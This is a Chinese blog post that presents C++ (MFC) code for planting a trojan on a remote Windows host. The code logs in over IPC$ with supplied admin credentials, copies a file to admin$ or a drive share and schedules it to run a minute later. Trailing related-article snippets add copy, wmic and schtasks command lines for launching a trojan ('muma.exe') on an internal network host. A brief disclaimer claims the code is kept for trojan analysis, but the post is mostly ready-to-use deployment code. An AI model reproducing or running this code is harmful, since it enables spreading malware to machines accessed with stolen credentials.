远程IPC种植木马

要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////
typedef struct TagHost
{
CString host;
CString user;
CString pass;
CString filename;
CString LocalFilePath;
CListBox* list;
}IPC;
void CShareDlg::OnStart() //启动线程序
{
  UpdateData(TRUE);
  IPC* ipc = new IPC;
  ipc->host = m_host;
  ipc->user = m_user;
  ipc->pass = m_pass;
  ipc->LocalFilePath = m_localfile;
  ipc->filename = filename;
  ipc->list = &m_list;
  AfxBeginThread(ThreadIpcConnect,ipc);
}
/////////////////////////////线程/////////////////////////////////////////////////////
UINT ThreadIpcConnect(LPVOID lpvoid)
{
  IPC* ipc;
  CListBox* list;
  ipc = (IPC*)lpvoid;
  CString host;
  CString admin;
  CString pass;
  CString filename;
  CString localfilepath;
  host = ipc->host ;
  pass = ipc->pass;
  admin = ipc->user;
  localfilepath = ipc->LocalFilePath;
  filename =ipc->filename ;
list = ipc->list;
  BOOL IpcConnect;
  LPTIME_OF_DAY_INFO TimeBuf=NULL;
  NET_API_STATUS Status;
  CString RemoteFilePath,CmdCom("admin$\");
///////////////////////////////IPC连接////////////////////////////////////////////////////////////////
  NETRESOURCE ns;
  TCHAR buf[MAX_PATH];
  wsprintf(buf,"\\%s\ipc$",host);
  ZeroMemory(&ns,sizeof(ns));
  ns.dwScope=RESOURCE_GLOBALNET;
  ns.dwType=RESOURCETYPE_ANY;
  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;
  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
  ns.lpLocalName="";
  ns.lpRemoteName=buf;
  ns.lpProvider=NULL;
  ns.lpComment=NULL;
  CString hhost = host;
  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);
///建立IPC连接
  if(IpcConnect)
  {
//连接成功后
///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////
    RemoteFilePath=("\\"+host+"\admin$\"+filename);
    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制
      if(!IpcConnect)
        {
          RemoteFilePath=("\\"+host+"\C$\"+filename);
          CmdCom="C:\"+filename;
          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
            if(!IpcConnect)
            {
               RemoteFilePath=("\\"+host+"\D$\"+filename);
               CmdCom="D:\"+filename;
               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
           if(!IpcConnect)
                  {
                     RemoteFilePath=("\\"+host+"\E$\"+filename);
                     CmdCom="E:\"+filename;
                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);
                     if(!IpcConnect)
                       {
                        RemoteFilePath ("\\"+host+"\F$\"+filename);
                        CmdCom = "F:\"+filename;
                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);
                       }
                  }
              }
         }
///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////
         if(IpcConnect)
         {//获取远程主机时间
           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);
            if(Status==NERR_Success)
            {//活取时间成功
///////////////////////////启动目标文件///////////////////////////////////////////////////////////////
              DWORD day=1,JobTime;
              AT_INFO ai;
              day=day*2;
              ai.Command=CmdCom.AllocSysString();
              ai.DaysOfMonth=day;
              ai.DaysOfWeek=0;
              ai.Flags=JOB_NONINTERACTIVE;
              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;
              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);
              //启动上传的文件,一分钟后启动
              if(Status==NERR_Success)
              {
                list->AddString(host+"启动成功");
              }
              else
                list->AddString(host+"启动失败");
              }
          else
            {
             list->AddString(host+"获取时间失败");
            }
         }
         else
         {
          list->AddString(host+"拷贝文件失败");
         }
    }
    else
    list->AddString(host+"连接失败");
return TRUE;
}
 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

时间: 2024-11-08 20:12:50

远程IPC种植木马的相关文章

用Python简单制作远程视频监控木马,简单的编程思路我就不吹了!

摘要: 从网上看到过用python远程发送截图的博客,这次我要用python实现远程视频监控,看起来既高大上,做起来又非常简单.先说一说整体思路,我们要做到手机发送邮件,python脚本接收到有特定邮件的信息,模拟鼠标操作点击qq上的视频通话按钮以达到视频监控的目的. 我们需要两个qq号,一个在电脑端登陆,一个在手机端登陆,python脚本需要的账号和密码是你电脑端的.代码所需第三方库:imaplib,pyautogui Imaplib是python的第三方库,我们用它来实现对邮件的操作,pya

内网IPC$种马的三种方法

copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe” schtasks计划任务远程运行 schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st

看完防木马招数 你电脑将会百毒不侵

现如今,手机成了我们生活中必不可少是通讯工具,但是也有很多人的手机存在安全隐患.腾讯手机管家带你看骗子植入手机木马的10大招术,相信看完以后你将会"百毒不侵". 1.冒充移动客服10086 犯罪分子通过技术手段伪装成移动客服10086向不特定多数人发送短信,以通知客户积分兑换.感恩回馈.话费打折等方式,收信人点击木马网址.诈骗短信中所提供的链接地址多为含有10086或l(字母L的小写)0086等字段的地址,令收信人误以为是官网链接而进行点击. 2.伪装成银行客服人员 此类案件中,犯罪分

Android使用Messenger进行Service IPC通信分析

如果想要进行IPC通信,一般写一个AIDL接口,再写一个Service子类,然后实现AIDL接口 当做IBinder返回给Activity界面层. 如果不想写AIDL接口文件,只是单I线程中与Service进行通信 我们可以用Android写好的Messenger类来处理,一样能将消息传递给Service进行通信. 先写上基本代码: public class MyService extends Service { Messenger messenger = null; public MyServ

换个思路应对木马来袭

自木马程序诞生至今,己经出现了多种类型,想在这里给它们来一次完全的列举和说明是不可能的,更何况大多数的木马都不是单一功能的木马,它们往往是很多种功能的集成品----甚至有很多从本公开的功能在一些木马中也广泛地存在着. 木马的危害尽人皆知,但是其工作原理并不是每个人都知道.首先,黑客会找机会把木马安插在目标系统的角落里,那么如果不运行它的话,其永远都不会对你的电脑产生威胁.但是只要黑客通过网络远程遥控了木马程序,窃取资料甚至破坏系统就成了轻而易举的事情了.所以,查杀隐藏在你电脑角落里的木马是目前最

使用shutdown命令实现局域网内远程关机、重启整蛊他人

用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\computer][/t xxx][/d [p|u:]xx:yy [/c "comment"]] 没有参数   显示帮助.这与键入 /? 是一样的.    /?         显示帮助.这与不键入任何选项是一样的.    /i         显示图形用户界面(GUI).             

IPC$ 命名管道

介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问. 四种默认共享: 共享名------资源----------------------注解 C$-----------C:------------------------默认共享 D$-----------D:-----------

那些年我们一起追逐过的安全工具

前言 每一段岁月,都会留下属于时代的记忆——那些年,我们所追逐与热衷的安全工具,亦是如此. 在那个信息不对称的年代,安全工具主要是在小圈子内传播.当年天真的我们(脚本小子),以为网络就是江湖,一套完美的工具就是你的兵器——路见不平一声吼,碰到注入亮阿D. 注:由于年代久远,当年的工具大多已停止更新,如今网上所能搜到的又可能携带后门,所以本文中就不提供下载地址了 阿D注入工具 简介 第一个介绍的肯定是阿D注入工具.那个时候大家都不大会用SQLMAP,或者根本没听说过.当时对SQL注入检测工具最出名

那些年我们一起追逐过的工具

那些年我们一起追逐过的安全工具 发布:小哲2016-12-9 16:39分类: 业界资讯标签: 黑客入侵 前言 每一段岁月,都会留下属于时代的记忆--那些年,我们所追逐与热衷的安全工具,亦是如此. 在那个信息不对称的年代,安全工具主要是在小圈子内传播.当年天真的我们(脚本小子),以为网络就是江湖,一套完美的工具就是你的兵器--路见不平一声吼,碰到注入亮阿D. 注:由于年代久远,当年的工具大多已停止更新,如今网上所能搜到的又可能携带后门,所以本文中就不提供下载地址了 阿D注入工具 简介 第一个介绍